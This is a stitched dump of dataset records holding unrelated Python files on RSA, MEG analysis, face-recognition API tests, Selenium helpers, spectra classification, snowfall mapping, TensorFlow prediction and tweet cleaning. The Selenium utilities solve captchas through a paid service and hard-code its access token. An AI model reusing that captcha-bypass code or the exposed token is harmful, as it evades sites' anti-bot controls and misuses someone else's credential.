prim\n\treturn result\n\nprint(\"plain: \" + str(plain))\ncipher = exp(plain,pubkey,n)\nprint(\"cipher: \" + str(cipher))\ntext = exp(cipher,privkey,n)\nprint(\"plain again:\" + str(text))\n","sub_path":"02_ciphers/03_asymmetric/RSA/schoolbookRSAWithSquareAndMultiply.py","file_name":"schoolbookRSAWithSquareAndMultiply.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243649443","text":"import numpy as np\nimport camcan_utils\nimport mfanalysis as mf\nimport mf_config\nimport matplotlib.pyplot as plt\nfrom joblib import Parallel, delayed\nimport os.path as op\nimport mne\nimport os\nimport h5py\nimport visualization_utils as v_utils\nimport hurst_results\nimport classification_utils as clf_utils\nfrom scipy.stats import ttest_rel\nfrom scipy.stats import pearsonr, spearmanr\n\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 12, 8\nrcParams['mathtext.default'] = 'regular'\nrcParams['font.size'] = 20\n\n\n# Load results\nsensor_type = 'mag'\nhurst_data = hurst_results.get_results(sensor_type=sensor_type)\neog_hurst_data = hurst_results.get_results(sensor_type='eog')\n\n\n#-------------------------------------------------------------------------------\n# Averages and topomaps\n#-------------------------------------------------------------------------------\n\n# Load raw to get info about sensor positions\nraw_filename = 'sample_raw.fif'\nraw = mne.io.read_raw_fif(raw_filename)\n# raw = camcan_utils.get_raw(hurst_data.mf_subjects[0], 'rest')\n\n# get sensor positions via layout\npos = mne.find_layout(raw.info).pos[hurst_data.channels_picks, :]\n\nvmax = np.abs(hurst_data.all_hurst_rest.mean(axis=0)).max()\nvmin = -vmax\nv_utils.plot_data_topo(hurst_data.all_hurst_rest.mean(axis=0), pos, vmin = vmin, vmax = vmax, title = 'H rest', cmap = 'seismic')\nv_utils.plot_data_topo(hurst_data.all_hurst_task.mean(axis=0), pos, vmin = vmin, vmax = vmax, title = 'H task', cmap = 'seismic')\nvmax = np.abs((hurst_data.all_hurst_rest - hurst_data.all_hurst_task).mean(axis=0)).max()\nvmin = 0\nv_utils.plot_data_topo(hurst_data.all_hurst_rest.mean(axis=0) - hurst_data.all_hurst_task.mean(axis=0),\n pos, vmin = vmin, vmax = vmax, title = '(H rest) - (H task)', cmap = 'Reds')\nv_utils.plot_data_topo((hurst_data.all_hurst_rest - hurst_data.all_hurst_task).std(axis=0),\n pos, vmin = vmin, vmax = vmax, title = 'Standard deviation of (H rest) - (H task)', cmap = 'Reds')\n\n\n#-------------------------------------------------------------------------------\n# Average log2(S(j, 2))\n#-------------------------------------------------------------------------------\ndef visualize_structure(sensor_name):\n sensor_index = hurst_data.ch_name2index[sensor_name]\n\n log2Sj2_rest = hurst_data.all_log2_Sj_2_rest[:, sensor_index, :]\n log2Sj2_task = hurst_data.all_log2_Sj_2_task[:, sensor_index, :]\n\n v_utils.plot_cumulants_2( [log2Sj2_rest, log2Sj2_task ],\n title ='Mean structure function - ' + sensor_name,\n labels = ['rest', 'task'], idx = '$\\log_2(S(j,2))$')\n\ndef visualize_structure_eog(sensor_index):\n log2Sj2_rest = eog_hurst_data.all_log2_Sj_2_rest[:, sensor_index, :]\n log2Sj2_task = eog_hurst_data.all_log2_Sj_2_task[:, sensor_index, :]\n\n v_utils.plot_cumulants_2( [log2Sj2_rest, log2Sj2_task ],\n title ='EOG Mean structure function - channel %d'%(sensor_index+1),\n labels = ['rest', 'task'], idx = '$\\log_2(S(j,2))$')\n\n\nvisualize_structure('MEG0311')\nvisualize_structure('MEG1841')\n\nvisualize_structure_eog(0)\nvisualize_structure_eog(1)\n\nraw.plot_sensors()\nplt.show()\n","sub_path":"visualize_hurst.py","file_name":"visualize_hurst.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"570269915","text":"import main.firebase\nimport requests\nimport base64\nimport json\nimport time\n\nfirebase = main.firebase.FireBase('../strangerdetection-firebase-adminsdk-ndswy-371433d43f.json',\n 'strangerdetection.appspot.com')\n\n\ndef test_server():\n url = firebase.get_image_access_url(\"tien.png\")\n content = requests.get(url).content\n localhost = \"http://127.0.0.1:5000/api/v1/encodings\"\n base64_string = str(base64.b64encode(content))[2:-1]\n\n data = {\n 'user_email': 'tientt@gmail.com',\n 'image': base64_string\n }\n print(json.dumps(data))\n x = requests.post(localhost, json=json.dumps(data))\n print(x.text)\n\n\ndef test_firebase():\n image_name = \"71650dc8-3674-4702-a948-308ae0369a6a.png\"\n print(firebase.get_image_access_url(image_name))\n\n\ndef test_create_new_encoding():\n localhost = \"http://127.0.0.1:5000/api/v1/encodings\"\n with open('../1440_Vladimir_Putin_Wallpaper.jpg', 'rb') as image:\n base64_string = str(base64.b64encode(image.read()))[2:-1]\n data = {\n 'user_email': 'tientt@gmail.com',\n 'image': base64_string\n }\n start = time.time()\n x = requests.post(localhost, json=json.dumps(data))\n end = time.time()\n print(\"Time: \" + str(end - start))\n response_data = json.loads(x.text)\n print(response_data)\n image_name = response_data['image_name']\n url = firebase.get_image_access_url(image_name)\n print(url)\n\n\ndef test_delete_encoding():\n localhost = \"http://127.0.0.1:5000/api/v1/encodings\"\n data = {\n 'image_name': '71d7c0e2-417d-4d27-90f3-51acc14126a3.png'\n }\n start = time.time()\n x = requests.delete(localhost, json=json.dumps(data))\n end = time.time()\n print(\"Time: \" + str(end - start))\n response_data = json.loads(x.text)\n print(response_data)\n\n\ndef test_detect():\n localhost = \"http://127.0.0.1:5000/api/v1/processImage\"\n with open('../tien.png', 'rb') as image:\n base64_string = str(base64.b64encode(image.read()))[2:-1]\n data = {\n 'image': base64_string\n }\n start = time.time()\n x = requests.post(localhost, json=json.dumps(data))\n end = time.time()\n print(\"Time: \" + str(end - start))\n response_data = json.loads(x.text)\n print(response_data)\n\n\nif __name__ == '__main__':\n #test_create_new_encoding()\n # test_delete_encoding()\n test_detect()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618901937","text":"from bestcaptchasolverapi3.bestcaptchasolverapi import BestCaptchaSolverAPI\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import wraps\nimport json\nfrom logging import getLogger\nfrom datetime import datetime\nfrom sys import platform, exc_info\nfrom time import sleep, time\n\nfrom django.conf import settings\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\nfrom selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException, ElementNotInteractableException, TimeoutException, \\\n ElementClickInterceptedException\nfrom selenium.webdriver import Remote, Chrome, ChromeOptions, DesiredCapabilities\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.expected_conditions import visibility_of_all_elements_located as all_visible, \\\n element_to_be_clickable as clickable, presence_of_element_located as present, url_matches, url_to_be\n\nlogger = getLogger(__name__)\n\nWAIT_001 = 0.01\nWAIT_01 = 0.1\nWAIT_05 = 0.5\nWAIT_075 = 0.75\nWAIT_SEC = 1\n\nJS_SCROLL_DOWN = 'window.scrollTo(0, document.body.scrollHeight)'\n\n\ndef threaded(f, executor=None):\n @wraps(f)\n def wrap(*args, **kwargs):\n return (executor or ThreadPoolExecutor()).submit(f, *args, **kwargs)\n\n return wrap\n\n\n@threaded\ndef hb_solve_captcha_bsc(img_data):\n bcs_access_token = '3C30731306914373BED04F4C4FD4F1AA'\n bcs = BestCaptchaSolverAPI(bcs_access_token)\n if settings.DEBUG:\n balance = bcs.account_balance()\n logger.debug(f'BCS balance: {balance}')\n resp_id = bcs.submit_image_captcha(img_data)\n return bcs.retrieve(resp_id)\n\n\ndef hb_win_size(page, dim):\n S = lambda dim: page.execute_script('return document.body.parentNode.scroll' + dim)\n return S.__call__(dim) + 10\n\n\ndef hb_save_elem_screenshot(elem, txt='', force=False):\n if force or settings.SAVE_SCREENSHOTS:\n f_name = f'{settings.BASE_DIR}/logs/{datetime.now().strftime(\"%Y.%m.%d.%H.%M.%S\")}_{txt}_ess.png'\n logger.debug(f'Saving {f_name}')\n try:\n elem.screenshot(f_name)\n except Exception as e:\n logger.error(f'Could not save {f_name}: {e}')\n\n\ndef hb_save_page_screenshot(page, suffix, force=False):\n if force or settings.SAVE_SCREENSHOTS:\n page.set_window_size(hb_win_size(page, 'Width'), hb_win_size(page, 'Height'))\n f_name = f'{settings.BASE_DIR}/logs/{datetime.now().strftime(\"%Y.%m.%d.%H.%M.%S\")}_{suffix.lower()}_pss.png'\n logger.debug(f'Saving {f_name}')\n page.save_screenshot(f_name)\n\n\ndef hb_get_page_screenshot(page):\n page.set_window_size(hb_win_size(page, 'Width'), hb_win_size(page, 'Height'))\n return page.get_screenshot_as_base64()\n\n\ndef hb_save_failed_captcha(img, txt='NO CODE', force=False):\n if force or settings.SAVE_CAPTCHA:\n f_name = f'{settings.MEDIA_ROOT}/captcha/{datetime.now().strftime(\"%Y.%m.%d.%H.%M.%S\")}_{txt}_.png'\n logger.debug(f'Saving {f_name}')\n img.screenshot(f_name)\n\n\ndef hb_get_page(url):\n \"\"\"\n Open Chrome via chromedriver, navigate to url and return t_load page\n :param url:\n :return: webdriver object\n \"\"\"\n t_start = round(time(), 2)\n opts = ChromeOptions()\n opts.add_experimental_option('detach', True)\n opts.headless = settings.BROWSE_HEADLESS\n caps = DesiredCapabilities.CHROME.copy()\n caps['headless'] = settings.BROWSE_HEADLESS\n service_url = 'http://localhost:5780'\n browser = None\n if 'linux' in platform:\n # noinspection PyBroadException\n try:\n browser = Remote(command_executor=service_url, keep_alive=True, desired_capabilities=caps, options=opts)\n logger.info(f'Connected to chromedriver service on {service_url}')\n except:\n logger.error(f'Could not connect to chromedriver service on {service_url} : {exc_info()}, trying local Chrome...')\n\n if not browser:\n e_p = '/usr/bin/chromedriver' if 'linux' in platform else 'bin\\\\chromedriver.exe'\n # noinspection PyBroadException\n try:\n browser = Chrome(executable_path=e_p, desired_capabilities=caps, options=opts)\n logger.debug(f'Opened Chrome: {e_p}')\n except:\n msg = f'Could not open Chrome: {exc_info()}'\n logger.error(msg)\n return None, msg\n t_load = round(time(), 2)\n logger.debug(f'Browser t_load in {t_load - t_start} sec')\n\n # TODO: check the influence of maximizing\n # while settings.BROWSE_HEADLESS = True\n\n # noinspection PyBroadException\n try:\n browser.maximize_window()\n except:\n logger.error(f'Can\\'t maximize window: {exc_info()}')\n logger.error(f'Note: settings.BROWSE_HEADLESS={settings.BROWSE_HEADLESS}')\n\n try:\n browser.get(url)\n except TimeoutException as e:\n msg = f'Could not open {url}: {e}'\n logger.error(msg)\n return None, msg\n\n return browser, ''\n\n\ndef hb_set_value(trigger, num_input, value):\n \"\"\"\n Look for node's child element, handling an exceptions.\n Retries 3 times, waiting 1 second.\n :param trigger:\n :param num_input:\n :param value:\n :return: (True, element object) if found and set or (False, error message) iotherwise\n \"\"\"\n # total = 4\n total = 3\n # cnt = total - 1\n err_msg = ''\n while total:\n trigger.click()\n sleep(WAIT_05)\n total -= 1\n # noinspection PyBroadException\n try:\n num_input.clear()\n sleep(WAIT_01)\n num_input.send_keys(str(value))\n except ElementNotInteractableException as e:\n err_msg = e.msg\n continue\n except:\n err_msg = exc_info()[1].msg\n continue\n else:\n return True, err_msg\n\n return False, err_msg\n\n\ndef hb_select_value(wait, trigger, dd_xpath):\n \"\"\"\n Look for node's child element, handling an exceptions.\n Retries 3 times, waiting 1 second.\n :param wait:\n :param trigger:\n :param dd_xpath:\n :return: (True, element object) if found and set or (False, error message) iotherwise\n \"\"\"\n trigger.click()\n # noinspection PyBroadException\n try:\n option = wait.until(clickable((By.XPATH, dd_xpath)))\n except:\n err_msg = f'data:image/jpeg;base64,{trigger.screenshot_as_base64}'\n else:\n # noinspection PyBroadException\n try:\n option.click()\n except (ElementNotInteractableException, StaleElementReferenceException, TimeoutException) as e:\n err_msg = e.msg\n except:\n err_msg = f'data:image/jpeg;base64,{trigger.screenshot_as_base64}'\n else:\n return True, ''\n\n return False, err_msg\n\n\ndef hb_look_for(node, xpath):\n \"\"\"\n Look for node's child element, handling an exceptions.\n Retries 3 times, waiting 1 second.\n :param node: node\n :param xpath: xpath to check\n :return: (True, element object) or (False, error message) if not found\n \"\"\"\n # noinspection PyBroadException\n try:\n elem = node.find_element_by_xpath(xpath)\n return True, elem\n except (NoSuchElementException, StaleElementReferenceException) as e:\n err_msg = e.msg\n except:\n err_msg = exc_info()[1].msg\n\n if err_msg:\n logger.error(err_msg)\n return False, err_msg\n","sub_path":"_/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"413750619","text":"# -*- coding: utf-8 -*-\n\"\"\"\n程序��明:采用蒙特卡洛方法对样本数据进行扩充,然后进行识别,考察大量样本数据下的识别效率和准确率。\n作者:刘军\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nfrom scipy import io as spi\nimport time as tm\nfrom matplotlib import pyplot as plt\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import cross_val_score,train_test_split,validation_curve\n\nfrom sklearn.preprocessing import StandardScaler #归一化\nfrom sklearn.decomposition import PCA\ndef load_Laman():\n '''加载拉曼谱图数据'''\n raw_data = spi.loadmat('../input/XJlaman_4_1.mat')\n x = raw_data['lamanxiangjing']\n y = np.zeros((x.T.shape[0]))\n for i in np.arange(0,30):\n y[i*30:i*30+30,]= i\n return x.T,y\n\ndef load_IMS():\n '''加载离子迁移谱数据'''\n raw_data = spi.loadmat('../input/XJlizi_4_1_1.mat')\n x = raw_data['XJlizi_4_1_1']\n y = np.zeros((x.T.shape[0]))\n for i in np.arange(0,30):\n y[i*30:i*30+30,]= i\n return x.T,y\n'''\n将数据进行扩充:\n1)每个维度的均值*0.1*随机数\n2)加上原值\n'''\ndef Create_Raman_Data(raw_data_x,raw_data_y,muls=10):\n '''每个数据扩展为mul个数据'''\n if muls == 1:\n return raw_data_x,raw_data_y\n mul = muls\n [m,n] = raw_data_x.shape\n # 构造[10*m,n]矩阵\n random_mean = np.ones((m*mul,n)) # 基于均值的随机波动矩阵\n mul_raw_data = np.ones((m*mul,n))\n mul_raw_data_y = np.ones((m*mul,1))\n # raw_data 扩充mul倍\n for i in range(m):\n mul_raw_data[i*mul:(i+1)*mul,: ] = raw_data_x[i, :]\n mul_raw_data_y[i*mul:(i+1)*mul ] = raw_data_y[i]\n # 各维度平均值\n mean_data = np.mean(raw_data_x, axis=0)\n #\n for i in range(m*mul):\n tp = mean_data * 0.001 * (np.random.ranf(n) - 0.5)\n random_mean[i, :] = tp + random_mean[i, :]\n return (random_mean + mul_raw_data),mul_raw_data_y\n\n[raw_x_ims,raw_y_ims] = load_IMS()\n[raw_x_raman,raw_y_raman] = load_Laman()\n# raw_x = np.concatenate((raw_x_raman,raw_x_ims),axis=1)\nraw_x = raw_x_raman\nraw_y = raw_y_ims\n\nmuls = 100\n# 取第一个样本的数据进行扩成\n[x1,y1] = Create_Raman_Data(raw_x_raman[0:30,:],raw_y_raman[0:30],muls=muls)\n# 保存生成的数据\nnp.savetxt('x1.txt',x1)\nnp.savetxt('y1.txt',y1)\n\n[x2,y2] = Create_Raman_Data(raw_x_raman[90:120,:],raw_y_raman[90:120],muls=muls)\n# 保存生成的数据\nnp.savetxt('x2.txt',x2)\nnp.savetxt('y2.txt',y2)\n\n\nx1 = np.loadtxt('x1.txt')\ny1 = np.loadtxt('y1.txt')\nx2 = np.loadtxt('x2.txt')\ny2 = np.loadtxt('y2.txt')\n\nx = np.concatenate((x1,x2),axis=0)\ny = np.concatenate((y1,y2),axis=0)\n\n# 归一化处理\nscaler = StandardScaler()\nx = scaler.fit_transform(x)\n\n# PCA降维\npca = PCA(n_components=10)\npca.fit(x)\nx = pca.transform(x)\n\n# svm 识别\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1,\n random_state=0)\n# 训练样本的数量\ntrain_num = 2200\n\nprint(train_num)\n# 构造训练与测试数据集合\nx_train = np.concatenate((x1[0:train_num,:],x2[0:train_num,:]),axis=0)\ny_train = np.concatenate((y1[0:train_num],y2[0:train_num]),axis=0)\n\nx_test = np.concatenate((x1[train_num:,:],x2[train_num:,:]),axis=0)\ny_test = np.concatenate((y1[train_num:],y2[train_num:]),axis=0)\n# 记录训练模型耗时\nt1 = tm.time()\nmodel = SVC(C=0.001, kernel='rbf')\nmodel.fit(x_train,y_train)\nt2 = tm.time()\n# 预测测试样本\ny_test_1 = model.predict(x_test)\n# 计算识别比例\nresult = np.sum(y_test == y_test_1) / y_test_1.shape[0]\n\nprint('训练样本数量:',x_train.shape[0])\nprint('测试样本数量:',x_test.shape[0])\nprint('训练模型耗时:%f秒'%((t2-t1)))\nprint('识别率',result)\n\n\n'''\nresults = np.zeros((30,3))\ni = 0\nfor train_num in np.arange(1900,2000,500):\n print(train_num)\n # 构造训练与测试数据集合\n x_train = np.concatenate((x1[0:train_num,:],x2[0:train_num,:]),axis=0)\n y_train = np.concatenate((y1[0:train_num],y2[0:train_num]),axis=0)\n\n x_test = np.concatenate((x1[train_num:,:],x2[train_num:,:]),axis=0)\n y_test = np.concatenate((y1[train_num:],y2[train_num:]),axis=0)\n # 记录训练模型耗时\n t1 = tm.time()\n model = SVC(C=0.001, kernel='rbf')\n model.fit(x_train,y_train)\n t2 = tm.time()\n # 预测测试样本\n y_test_1 = model.predict(x_test)\n # 计算识别比例\n result = np.sum(y_test == y_test_1) / y_test_1.shape[0]\n\n print('训练样本数量:',x_train.shape[0])\n print('测试样本数量:',x_test.shape[0])\n print('训练模型耗时:%f秒'%((t2-t1)))\n print('识别率',result)\n results[i:,] = [train_num,result,(t2-t1)]\n i= i+1\n\nplt.plot(results[:,0],results[:,1],'bo')\n# plt.plot(results[:,0],results[:,2],'r+')\nplt.show()\n'''\n\n\n\n\n","sub_path":"Apple_essence/样本扩充与识别.py","file_name":"样本扩充与识别.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116932169","text":"\"\"\"\nIEM Snowfall Analysis Engine\n\n\"\"\"\nimport iemre\nimport iemplot\nimport iemdb\nimport numpy\nimport random\nimport mx.DateTime\nfrom iem.plot import MapPlot\nimport gdal\n\nIEM = iemdb.connect('iem', bypass=True)\nicursor = IEM.cursor()\nPOSTGIS = iemdb.connect('postgis', bypass=True)\npcursor = POSTGIS.cursor()\n\ndef lalo2pt(lat, lon):\n x = int(( -130.0 - lon ) / - 0.01 )\n y = int(( 55.0 - lat ) / 0.01 )\n return x, y\n\ndef sg2pt(lon, lat):\n x = int(( lon - iemre.WEST ) / 0.25 ) \n y = int(( lat - iemre.SOUTH ) / 0.22 )\n return x, y\n\n\ndef init_grid():\n \"\"\"\n Initialize the grid with Q2 data!\n \"\"\"\n lat0 = iemre.SOUTH\n lat1 = iemre.NORTH\n lon0 = iemre.WEST\n lon1 = iemre.EAST\n x0, y0 = lalo2pt(lat1, lon0)\n x1, y1 = lalo2pt(lat0, lon1)\n\n fp = \"/home/ldm/data/gis/images/4326/q2/p48h.png\"\n q2 = gdal.Open(fp, 0)\n q2d = numpy.flipud( q2.ReadAsArray()[y0:y1:22,x0:x1:25] )\n\n return q2d / 25.4 # hard code snow ratio!\n\ndef fetch_lsrs():\n vals = []\n lats = []\n lons = []\n # Query LSR Data...\n pcursor.execute(\"\"\"\n SELECT state, max(magnitude) as val, x(geom) as lon, y(geom) as lat\n from lsrs_2012 WHERE type in ('S') and magnitude > 0 and \n valid > '2012-12-09 00:00' and valid < '2012-12-10 12:00'\n and x(geom) BETWEEN %s and %s and\n y(geom) BETWEEN %s and %s \n GROUP by state, lon, lat\n \"\"\",(iemre.WEST, iemre.EAST, iemre.SOUTH, iemre.NORTH))\n for row in pcursor:\n vals.append( row[1] )\n lats.append( row[3] + (random.random() * 0.01)) \n lons.append( row[2] )\n return {'vals': vals, 'lats': lats, 'lons': lons}\n\ndef fetch_coop():\n vals = []\n lats = []\n lons = []\n icursor.execute(\"\"\"\n SELECT id, sum(snow), x(geom) as lon, y(geom) as lat, count(*) from\n summary_2012 t JOIN stations s ON (s.iemid = t.iemid) where \n (network ~* 'COOP' or network ~* 'COCORAHS') and \n day in ('2012-12-09', '2012-12-10') and snow >= 0 and \n x(geom) BETWEEN %s and %s and\n y(geom) BETWEEN %s and %s \n GROUP by id, lon, lat ORDER by sum DESC\n \"\"\", (iemre.WEST, iemre.EAST, iemre.SOUTH, iemre.NORTH))\n for row in icursor:\n\n vals.append( row[1] )\n lats.append( row[3] )\n lons.append( row[2] )\n return {'vals': vals, 'lats': lats, 'lons': lons}\n\nsnowgrid = init_grid() # inches\n\"\"\"\nlsrs = fetch_lsrs()\ncoop = fetch_coop()\n\nlats = []\nlons = []\nvals = []\n\nfor i in range(len(lsrs['vals'])):\n x, y = sg2pt(lsrs['lons'][i], lsrs['lats'][i])\n #print snowgrid[y,x], lsrs['vals'][i], x, y, lsrs['lons'][i], lsrs['lats'][i]\n sg = snowgrid[y,x]\n if lsrs['vals'][i] > sg:\n lats.append( lsrs['lats'][i] )\n lons.append( lsrs['lons'][i] )\n vals.append( lsrs['vals'][i] )\n\"\"\"\n\n\nmp = MapPlot(sector='midwest')\nmp.contourf(iemre.XAXIS, iemre.YAXIS, snowgrid, range(0,20))\nmp.postprocess(view=True)","sub_path":"scripts/current/snow_analysis.py","file_name":"snow_analysis.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569601314","text":"import pickle\nfrom .CreateHuman import man, woman\n\nclass Earth:\n\n def __init__(self):\n print('Добро пожаловать в конфигуратор человеков')\n self.menu = [\n ['Добавить мужчину', man],\n ['Добавить женщину', woman],\n ]\n self.humans = []\n\n def add_humans(self):\n print()\n for i, item in enumerate(self.menu):\n print(f'{i} - {item[0]}')\n print()\n num = int(input('Введите номер человека: '))\n self.humans.append(self.menu[num][1]())\n\n def edit_humans(self):\n for i, humans in enumerate(self.humans):\n print(humans.__class__.__name__+'[id: '+str(i)+']')\n self.humans[int(input('Введите номер человека: '))].edit()\n print('--------------------')\n print('Изменения сохранены')\n\n def delete_humans(self):\n self.humans.pop(int(input('Введите номер человека: ')))\n\n def delete_all(self):\n self.humans.clear()\n print(' \\n \\n Метеорит вылетел \\n . \\n . \\n . \\n . \\n . \\n . \\n Прилетел')\n\n def show_humans(self):\n for i, humans in enumerate(self.humans):\n print()\n print(humans.__class__.__name__+'[id:'+str(i)+']')\n humans.print()\n\n def save_humans(self):\n f = open(r'data.txt', 'wb')\n pickle.dump(self.humans, f)\n f.close()\n print('Список сохранен')\n\n def load_humans(self):\n f = open(r'data.txt', 'rb')\n self.humans = pickle.load(f)\n print('Список загружен')\n","sub_path":"asm1905/st14/Earth.py","file_name":"Earth.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244373176","text":"\"\"\"\nneed to save the histogram bins for visualization purposes still,\nas well as cosmetics such as axis labels and region names\n\"\"\"\nimport logging\nfrom pathlib import Path\n\nfrom . import histo\n\n\nlog = logging.getLogger(__name__)\n\n\ndef _build_figure_name(region, is_prefit):\n \"\"\"construct a name for the file a figure is saved as\n\n Args:\n region (dict): the region shown in the figure\n is_prefit (bool): whether the figure shows the pre- or post-fit model\n\n Returns:\n str: name of the file the figure should be saved to\n \"\"\"\n figure_name = region.replace(\" \", \"-\")\n if is_prefit:\n figure_name += \"_\" + \"prefit\"\n else:\n figure_name += \"_\" + \"postfit\"\n figure_name += \".pdf\"\n return figure_name\n\n\ndef data_MC(config, histogram_folder, figure_folder, prefit=True, method=\"matplotlib\"):\n \"\"\"draw a data/MC histogram, control whether it is pre- or postfit with a flag\n\n Args:\n config (dict): cabinetry configuration\n histogram_folder (str): path to the folder containing template histograms\n figure_folder (str): path to the folder to save figures in\n prefit (bool, optional): show the pre- or post-fit model, defaults to True\n method (str, optional): what backend to use for plotting, defaults to \"matplotlib\"\n\n Raises:\n NotImplementedError: when trying to plot with a method that is not supported\n NotImplementedError: when trying to visualize post-fit distributions, not supported yet\n \"\"\"\n log.info(\"visualizing histogram\")\n for region in config[\"Regions\"]:\n histogram_dict_list = []\n for sample in config[\"Samples\"]:\n for systematic in [{\"Name\": \"nominal\"}]:\n is_data = sample.get(\"Data\", False)\n histogram, _ = histo.load_from_config(\n histogram_folder, sample, region, systematic, modified=True\n )\n histogram_dict_list.append(\n {\n \"label\": sample[\"Name\"],\n \"isData\": is_data,\n \"hist\": histogram,\n \"variable\": region[\"Variable\"],\n }\n )\n\n figure_name = _build_figure_name(region[\"Name\"], prefit)\n\n if prefit:\n if method == \"matplotlib\":\n from cabinetry.contrib import histogram_drawing\n\n figure_path = Path(figure_folder) / figure_name\n histogram_drawing.data_MC_matplotlib(histogram_dict_list, figure_path)\n else:\n raise NotImplementedError(\"unknown backend\")\n else:\n raise NotImplementedError(\"only prefit implemented so far\")\n","sub_path":"src/cabinetry/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"130606823","text":"import tensorflow as tf\nimport pickle\nimport data_reader\nimport sys\n\nRATE = .001\n\ndef predict(num_attributes, num_labels, NEURONS, instance):\n sess = tf.Session()\n\n hidden_layers = []\n f = open('accuracies.csv', 'w')\n\n # Set up placeholders for training attribute and label values\n x = tf.placeholder(tf.float32, shape=[None, num_attributes])\n y = tf.placeholder(tf.float32, shape=[None, num_labels])\n\n # Weights and biases for first hidden layer\n w_hidden = tf.Variable(tf.truncated_normal([num_attributes, NEURONS], stddev=0.1))\n b_hidden = tf.Variable(tf.constant(0.1, shape=[NEURONS]))\n\n # Output of first hidden layer\n net_hidden = tf.matmul(x, w_hidden) + b_hidden\n out_hidden = tf.sigmoid(net_hidden)\n\n w_output = tf.Variable(tf.truncated_normal([NEURONS, num_labels], stddev=0.1))\n b_output = tf.Variable(tf.constant(0.1, shape=[num_labels]))\n\n net_output = tf.matmul(out_hidden, w_output) + b_output\n\n if num_labels == 1: # Activation and loss functions for binary predictions\n prediction = tf.sigmoid(net_output)\n loss = tf.reduce_sum((y - prediction) * (y - prediction))\n else: # activation and loss functions for multinomial regression\n prediction = tf.nn.softmax(net_output)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=net_output))\n\n backprop = tf.train.AdamOptimizer(RATE).minimize(loss) # Set up backprop with given loss function\n\n saver = tf.train.Saver()\n saver.restore(sess, \"/tmp/model.ckpt\")\n\n p = sess.run(prediction, feed_dict = {x : [instance]})\n return p[0][0]\n\n\n\ndef main():\n file_name = sys.argv[1]\n pickle_file = open(file_name, 'rb')\n attribute_values, num_attributes, neuron_num = pickle.load(pickle_file)\n fed_instance = sys.argv[2:]\n\n instance = data_reader.one_hot_coding(fed_instance, attribute_values)\n\n result = predict(num_attributes, 1, neuron_num, instance)\n if result <= .5:\n print(0)\n else:\n print(1)\n\nmain()","sub_path":"neural/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518110773","text":"import TwitterAPI\nimport re\nfrom datetime import datetime, timedelta\n\nsamples = ['@BarackObama',\n '@katyperry',\n '@justinbieber',\n '@rihanna',\n '@taylorswift13',\n '@Cristiano',\n '@ladygaga',\n '@TheEllenShow',\n '@elonmusk',\n '@ArianaGrande',\n '@realDonaldTrump',\n '@jtimberlake',\n '@KimKardashian',\n '@selenagomez',\n '@POTUS',\n '@britneyspears',\n '@cnnbrk',\n '@shakira',\n '@narendramodi',\n '@jimmyfallon']\n\nemoji_pattern = re.compile(\"[\"\n u\"\\U00002070-\\U0010FFFF\" # Everything that is not Latin Alphabet\n\n # U\"\\U00002700-\\U000027BF\" # Dingbats \n # u\"\\U0001F600-\\U0001F64F\" # emoticons\n # u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n # u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n # u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n\n\ndef get_clean_tweets(tmln):\n clean_tweets = []\n for tweet in tmln:\n clean_tweet = re.sub(r'https://t.co/[a-zA-Z0-9./_\\-]+', '', tweet.full_text) # Remove links\n clean_tweet = clean_tweet.replace('\\n', ' ') # Remove new line symbols\n clean_tweet = emoji_pattern.sub(r' ', clean_tweet) # Remove symbols (non-Latin Alphabet)\n clean_tweet = clean_tweet.strip() # Strip extra whitespace\n if len(clean_tweet) > 0: # Check that tweet wasn't just a link or emoji, has actual text\n clean_tweets.append(clean_tweet)\n else:\n pass\n\n return clean_tweets\n\n\nif __name__ == \"__main__\":\n check_day = datetime.strftime(datetime.today() - timedelta(days=1), '%a %b %d')\n\n tweets = []\n\n for user in samples:\n timeline = TwitterAPI.get_tweets(user, check_day)\n\n if len(timeline) > 0:\n tweets.append(' '.join(get_clean_tweets(timeline)))\n else:\n continue\n\n str_tweets = ' '.join(tweets)\n\n # with open('/home/william/PycharmProjects/hegebot/text.txt', 'a') as file:\n # file.write(str_tweets)\n","sub_path":"GetTrainText.py","file_name":"GetTrainText.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"219086382","text":"#!/usr/bin/python3\n\nimport 